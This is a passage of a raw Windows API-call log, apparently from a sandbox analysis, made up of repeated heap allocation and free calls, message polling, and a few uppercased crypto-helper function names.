(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb274) returned 0xac2018 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.788] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.788] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb274) returned 0xac2018 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0041.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb274) returned 0xad8518 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.790] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.791] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.791] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.792] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.793] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.794] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.796] 